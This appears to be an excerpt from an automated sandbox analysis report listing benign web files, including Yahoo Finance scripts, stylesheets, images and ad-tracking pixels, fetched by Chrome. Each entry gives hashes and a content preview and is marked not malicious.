                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4BB0B7A2B5D42B4C4FCC82B438FA2C2879A7FF9273B5563A99577327810D8B38
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD216100EF2A8344188C554DA76FF338B5B19C042B4F2E4C17549CF747B577D169C2CDE4B47051DA29EAE2AF678AEFDF18D6FB0712F0EFE0A580EB2A938C00DB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:......JFIF.............C....................................................................C.........................................................................d............................................F..........................!.1.AQ."2aq.B...#R....$3Cb....r...%&...S.d.................................0......................!...1..A"2Q..#3$aB.4Cq..............?....F.#....G..i.e.h.I.].u.].$...O..*:.$l2...`p.E.V..+.T..~J8.\...JT.,.&...a.o........F=+a.$...S.S.*b.=o.`.J$....%...f..H+B.$....Q.... ..$E>....q.R..Z-...t.Z~;..N!r...b0S...5..z.H,b$:...'B33...8.`s..WC+.Z..[.D...|v.."..9%.G.S.!.l4..M1...S...w.3..L7.kO.7%Y=....MQ..5m.P.T.4+.eS.....(k.I ..GD.%a..Ul.F)J%..T....+z.,.o......\QG`...m@g......o..-.>.E1.1..-.=eu..1G.%R.t.e...B......$Y[x........$.h..a...N.PR"..l...w..A..b&...l[T......h.)..8|....a..6T.g.q...P.3).).=.VG.v.-.1.|?.PY.@j.8.,..#...Y"..^...e.E.(..U...v..9I..n.......D. .......by..O.k..:Y.K..'95+D....z.=..?.s.....C...[8...*...j.Y.G..Bp*.C.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2859)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.4371594490509425
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:KrOb0yw+Y0xy8qznaHyWAbG3/MQjUo+ejRdz/3M1tkPAAk/cCQDhbi3ssTA6vn:W9IxWznkKCP3X+ejR9/czkYAkECQDZw7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B78A0ED869BB15672BC487A826FC9AF4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:172BAB8588599D59F2DF84E96682C7842D110C55
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:0E9F159AB39B71B0894AD68B4FF9D89AD7C234511587B4614BF872C2D32E9F4D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:1E2EF8D5DCE4E574AEA45DB5CEF29E8A1D641CD68C464BC73A868401C0BEFA9A44AD317048EBC9A5D24A7C39B6D7553283B75716F28867CB2531A5F357E9D20F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as j,c as P,e as E,b as I,d as O,f as w,j as k,i as g,q as p,L as R,k as G,l as b,F as B,G as F,u as z,g as A,a as D,v as M,y as T}from"./scheduler.Dsuh-FKt.js";import{S as W,i as H,t as v,g as J,a as S,e as K,c as Q,b as U,m as X,d as Y}from"./index.CvwOawEI.js";import{A as Z}from"./AdGroup.B9K-yuAc.js";import{r as $}from"./resizeUtil.BFOdtaWL.js";import{r as x}from"./ads.DhuB_mth.js";import{P as ee}from"./commonUtil.BWwawKjd.js";const se=t=>({}),V=t=>({}),te=t=>({}),L=t=>({refreshAds:t[5]}),ie=t=>({}),N=t=>({});function q(t){let e,r,f,l,h;const d=t[7].sidebar,n=P(d,t,t[6],V);return l=new Z({props:{ids:t[4],className:"tw-m-0 tw-pb-2"}}),{c(){e=E("div"),r=E("div"),n&&n.c(),f=I(),Q(l.$$.fragment),this.h()},l(i){e=O(i,"DIV",{class:!0});var u=w(e);r=O(u,"DIV",{class:!0});var a=w(r);n&&n.l(a),f=k(a),U(l.$$.fragment,a),a.forEach(g),u.forEach(g),this.h()},h(){p(r,"class","tw-sticky tw-top-32"),p(e,"class","sidebar yf-hvsrhi")},m(i,u){G(i,e,u),b(e,r),n&&n.m(r,null),b(r,f),X(l,r,null)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5257351171929923
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUEIHh/:i4/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:13E1C7A2184E36D7AE519E99B1AA226F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:355CCAD4EAC39838E1CC76FD0B670FD2EA1E5AA3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:48A33CA9F42B91902D57AD8AC52E1CE32B92C8C10C732F2DBB6FE960EBFD9438
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B1A6CFA7B21DBB0B281D241AF609F3BA7F3A63E5668095BBA912BF7CFD7F0320BAF7C3B0BFABD0F8609448F39902BAEB145BA7A2D8177FE22A6FCEA03DD29BE1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pr-bh.ybp.yahoo.com/sync/pubmatic/176682A8-E121-44A7-818D-4FE53D542BB2?gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (852)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):853
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.225626342138373
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:K5ps3LgGLABPZ5/xrAboG9S1dfwlyAqrIMSR1Y9Ppvn:KTGLBEF/xrA0G9OAqrIl2vn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:ECB54AF9C3051A8A9E9792256E89CACB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:47C9819F0BECA5B81DE71FEDBD7085DACD0590F2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7481F4F84E83774D38EF2EC0E07033DE63F3A018D527AEF73BD2E7AE635F8457
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:95AD9B2FFF55C8CABE757AAFD9253045BF67C9DB274251338208CD14ADF43C6998DEFB150BB48E718842A58A7D74B82F539D1EA4B36F94BAFBA8F2A248339F8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SkeletonLoader.D0M7dqCu.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as o,e as c,d as u,f as h,i as d,q as n,L as f,k as g,n as r}from"./scheduler.Dsuh-FKt.js";import{S as _,i as I}from"./index.CvwOawEI.js";function w(t){let e,s;return{c(){e=c("div"),this.h()},l(a){e=u(a,"DIV",{class:!0,"data-testid":!0}),h(e).forEach(d),this.h()},h(){n(e,"class",s="loader "+t[0]+" "+t[2]+" "+t[1]+" yf-10mmfrb"),n(e,"data-testid","skeleton-loader"),f(e,"wideImg",t[2])},m(a,i){g(a,e,i)},p(a,[i]){i&7&&s!==(s="loader "+a[0]+" "+a[2]+" "+a[1]+" yf-10mmfrb")&&n(e,"class",s),i&7&&f(e,"wideImg",a[2])},i:r,o:r,d(a){a&&d(e)}}}function y(t,e,s){let{type:a="default"}=e,{className:i=""}=e,{wideImg:m=!1}=e;return t.$$set=l=>{"type"in l&&s(0,a=l.type),"className"in l&&s(1,i=l.className),"wideImg"in l&&s(2,m=l.wideImg)},[a,i,m]}class k extends _{constructor(e){super(),I(this,e,y,w,o,{type:0,className:1,wideImg:2})}}export{k as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11056
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.929610855176513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:H2eEiii5rxQMsB/KsHuep+ISNs0ArOaQLRfH38gpBNBNNLzhsIFaTvraUQ+06dix:WvvOrwDp4Ns3OF38kfNNfhqTG+Bdq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:35CE76F895AFD446490F0BE680F8D2F1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:DA9583E22E16E86E1ABC9A4E0F6E57CDDE0A2470
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F2BF71599C015D8DACC852D5FF53DAE5ABCF847AF076541FAFDE3B0CB2F160D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:83B31091842E86A021B5FB5A65588423BFB880352A1B545C7FF8D541721FB603DEB85C3D3708F6BE9358D636B9D4840235064FC7CEEC9B1A203CFE856D51E946
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/uu/api/res/1.2/Lg5WgrqEEIfUVDSR.3ISjQ--~B/Zmk9c3RyaW07aD0yODQ7cT04MDt3PTUzNjthcHBpZD15dGFjaHlvbg--/https://media.zenfs.com/en/usa_today_news_641/e0e4d3ffc4cc8cc7accd7efa9f2d137d.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF(+..WEBPVP8X.... .........ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .(..0....*....>y:.I$.""&.{....en.....*e=d....|.y?...v[..d.........~..U~....s9..%m&..w..N...\...Avc......Rn..D.k....5....Bd0.&mp...n5.p..GQ.xo.4_...Xu........l....b@....U.5J..=..b..C.;.BM..J.....-..%..z)5.Ert.c....t.V..4[.1. .&."...-..8.h0.n.@-..{.O..bZ.mt.(s....!..$..).D..]..m...X....&r..)........W...CPW.zJv...=Q.....3...$P4.b.4........@...+.p.i.z......r..5.4Q...Qn.q..B$"}.....\H...\A.>].HjZ....*...m.].m .
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):5311
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.046822701969818
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:duegRhCpwcn4QfbE/XOZjt/r6tCrY6saTGTbAaNkYaySgoaauIfQYCSG8IrW:OhCpwcn4QfbSOttT6MU6saTGTkYaySgq
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:BA0777792CE6C88CB6AC61D50F5ED420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:096E3337C3EB08177FC61F058A0A43FE7CC486EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:2CFC3D9F68235DCA692E8B8D70E2DE1F872D321133005C628D1306AC0D72F225
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C8D17040A8966648EE790EB91235553096BCE4050814696A6F741A8E1C7EA9233EC2CC4005C3918B507B939D3E26A812212A40B87C6CD7CB7E414A627B52D066
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://cdn.taboola.com/scripts/prebid_iframe_sync.html?gdpr=0&gdpr_consent=&us_privacy=1YNN&gpp=DBAA&gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!doctype html>.<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport". content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">. <meta http-equiv="X-UA-Compatible" content="ie=edge">. <title>Document</title>. <script type="text/javascript">."use strict";..function _slicedToArray(arr, i) { return _arrayWithHoles(arr) || _iterableToArrayLimit(arr, i) || _unsupportedIterableToArray(arr, i) || _nonIterableRest(); }.function _nonIterableRest() { throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method."); }.function _unsupportedIterableToArray(o, minLen) { if (!o) return; if (typeof o === "string") return _arrayLikeToArray(o, minLen); var n = Object.prototype.toString.call(o).slice(8, -1); if (n === "Object" && o.constructor) n = o.constructor.name; if (n === "Map" || n === "Set") return Array.from(o); i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkxl7/lHh/:slf/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://us-u.openx.net/w/1.0/sd?id=537082476&val=RO9hsv43VjtJegiqx3XZlggueyE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (9985), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):9985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.39424531478431
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:eluv6qz171WxJIvNzJYhltvvZcvfe2U1RJAZ4UDTxZFY:PvaxJIvNzO4/FbPxZFY
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:E1026852C4E85D7DF641ED51990B2993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:41616AB4D20413CF3CE54A66A0CC9044E41E25A3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:872722495556413DF2909833C48A7A9A8183F041700B150F222402B65E5F0307
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:47B4DED13C609E4ED227EED179FEDB2FDBF4CB91321AF0C47352FED8B8DA38282F44EA5423B778F5B90B48FDEFF3CA41083C8564B4D3114350DC1173B4A34721
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/ms/trendingNow.yhome-atomic.c9493b0439b3a8ef64a3f6b7f532117c.min.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:#atomic .Ai\(c\){align-items:center}#atomic .Bd\(n\),.Bd\(n\){border:none}#atomic .Bdc\(\$srchFujiDirtySeagull\){border-color:#e0e4e9;border-color:var(--dirty-seagull,#e0e4e9)}#atomic .Bdc\(t\){border-color:transparent}#atomic .Bdendc\(\#0057b8\)\:\:b::before{border-right-color:#0057b8}#atomic .Bdendc\(\$srchFujiHulkPants\)\:\:b::before{border-right-color:#7e1fff;border-right-color:var(--hulk-pants,#7e1fff)}#atomic .Bdbc\(\#5015b0\){border-bottom-color:#5015b0}.srchTGBlackFri .srchTGBlackFri_Bdbc\(\#000000\){border-bottom-color:#000!important}.srchTGCyberMon .srchTGCyberMon_Bdbc\(\#00873c\){border-bottom-color:#00873c!important}#atomic .Bdstartc\(\#7e1fff\){border-left-color:#7e1fff}.srchTGBlackFri .srchTGBlackFri_Bdstartc\(\#2c363f\){border-left-color:#2c363f!important}.srchTGCyberMon .srchTGCyberMon_Bdstartc\(\#009c94\){border-left-color:#009c94!important}#atomic .Bds\(s\){border-style:solid}#atomic .Bdends\(s\)\:\:b::before{border-right-style:solid}#atomic .Bdw\(1px\){border-width:1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://pagead2.googlesyndication.com/pcs/activeview?xai=AKAOjsvnElUdjZ49w8F4xUEDrvSdq8pBccTc3kMFLVfKmVlScdHg1cz6m9NSSpT7cuDTqlWUW-OpMy81Zuhevf1Esw5SI0XFltfN2YD9nwKNdjUzUE6anmiwSqspzUywZwGW6lCUZvvu1REJDONwseyIoMD59GZl-dmpUHsU9KJei2TIw-xXL3ZO-afTjgD_qxuHyDsZAw&sig=Cg0ArKJSzFHETDoJKhDxEAE&id=lidartos&mcvt=31289&p=24,146,274,1116&tm=60167.20000000001&tu=28878.70000000001&mtos=31289,31289,31289,31289,31289&tos=31289,0,0,0,0&v=20240925&bin=7&avms=nio&bs=0,0&mc=1&if=1&vu=1&app=0&itpl=19&adk=1820292226&rs=4&la=1&cr=0&uach=WyJXaW5kb3dzIiwiMTAuMC4wIiwieDg2IiwiIiwiMTE3LjAuNTkzOC4xMzIiLG51bGwsMCxudWxsLCI2NCIsW1siR29vZ2xlIENocm9tZSIsIjExNy4wLjU5MzguMTMyIl0sWyJOb3Q7QT1CcmFuZCIsIjguMC4wLjAiXSxbIkNocm9taXVtIiwiMTE3LjAuNTkzOC4xMzIiXV0sMF0%3D&vs=4&r=b&co=2364972801&rst=1727716926926&rpt=30135&isd=0&lsd=0&ec=1&met=ce&wmsd=0&pbe=0&fle=0&vae=0&spb=0&sfl=0&ffslot=0&reach=8&io2=0"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (3774)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3775
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.438195863541109
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:96:R4xPyudv2HvHclY2fTzRcX1ixbgnslpjhJW6agh3Kb3X4LQl:R6PJdYvYYqTzCwxbgslpjhc6Th3Kbn+c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:47E7411E64702613E1068FB6C7BA3370
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:663A7C587F4AE8AEB85AD413D25080A72A8A4EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A3FB3D224BCB1DF30C7B529F4AFEE5138312BDD2A6996C822A63FD19675047E6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B7713CAA1CE12E46E72096C61525B0B81E970041BECB3BE25B9F99843E40BD4B18CCE2C26DC060324CF28350CE54C913FEC2BEF106D299A341492761AE139FED
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/chartUtil.-voOXoQ6.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import l from"./webpack-assets-prod.DkcX54ri.js";const E="yf-quote-chart-settings",m="1d-qsp",H="1d-sm",R=480,X={line:"Line",candle:"Candle",mountain_baseline_delta:"Baseline",mountain:"Mountain",bar:"Bar"};function v(){const t={extendedHoursEnabled:!0,tooltipEnabled:!0};try{const e=window.localStorage.getItem(E);return e===null?t:JSON.parse(e)}catch{}return t}function U(){const t=v();try{window.localStorage.setItem(E,JSON.stringify(t))}catch{}return t}function k(t,e){return["EQUITY","ETF"].indexOf(t.toUpperCase())>-1&&["ASE","NAS","NXX","NMS","NYQ","NYS","PCX","NCM","NGM","BTS"].indexOf(e.toUpperCase())>-1}function O(t,e){switch(t){case"tooltipEnabled":window.finQuoteChart.stx.layout.headsUp={floating:e};break;case"extendedHoursEnabled":window.finQuoteChart.setExtendedHours(e);break}}function b(t){return t<=R}function q(t){const e=b(window.finQuoteChart.stx.chart.canvasWidth);return["MUTUALFUND","CUL_IDX","CUL_SUB_IDX"].indexOf(t)>-1?e?"1m-sm":"1m":e?H:m}function M(t){const e=b(window
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (15982)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):15983
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.276310747729203
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:OlBFsc1FscPFschEi+Q9zwXyE3fue8C8LJ+:Opr+QRlE/8U
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:76589F389BD1114C31FBA4F046283E7D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:97EB2C52BE92F67E09B70407A60A99FBC33587A6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:F4611C44096648CA1D0A46DB407B8A7ABDCFCBF4AE424097DA3DD825112AB025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:B632E0BE942A6F8B8904E155A2CABC1EEFF01F4FF4A3239C7C31D3CD2C2B020CB2B756006E75E3FBADBA7C41FC963A0E0815D4CE825F611CD25E512C6463F7A4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/quoteUtil.C6mXO8A-.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{a as n,t as m,f as u,b as T,N as g}from"./commonUtil.BWwawKjd.js";import{p as R}from"./43.BgWy8GOF.js";import{l as N}from"./loadQuoteType.ol0a8pjs.js";import{e as A}from"./index.g5YcAAdQ.js";const H=/[a-zA-Z0-9^.$_+=*&:@~-]+/g,l={POST:"POST",PRE:"PRE",REGULAR:"REGULAR"},L=["__quoteLeaf","__companyInsights","__quoteleaf"],M=["/valute/convertitore","/divisas/conversor","/devises/convertisseur","/waehrungen/waehrungsrechner","/finanzas-personales/conversor-divisas"],F={CLOSED:l.POST,POST:l.POST,POSTPOST:l.POST,PRE:l.PRE,PREPRE:l.POST,REGULAR:l.REGULAR},G=new Set(["analyst-ratings","analysis","balance-sheet","cash-flow","community","components","history","financials","futures","holders","holdings","insider-roster","insider-transactions","key-statistics","latest-news","news","options","performance","press-releases","profile","purchase-info","risk","sec-filing","summary","sustainability","chart"]),B=["price","summaryDetail","pageViews","financialsTemplate"],K={MONEYMARKET:"pf-banking"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "137-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 155933
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):48981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.995542017669815
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:EF88SZUKmNFzljrmI7ElKmrCeipGFjvTnQzFcPrjwavfgJ8T7ezbkUzemo7wZ0G:Ey83jr5mKmrCFGJTnQzFcVvIJ83lUxEy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:F01E975B514095DD2575C2A657B27E30
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:969D181F920C79C2E2FB095068C7EC4F3A248AB2
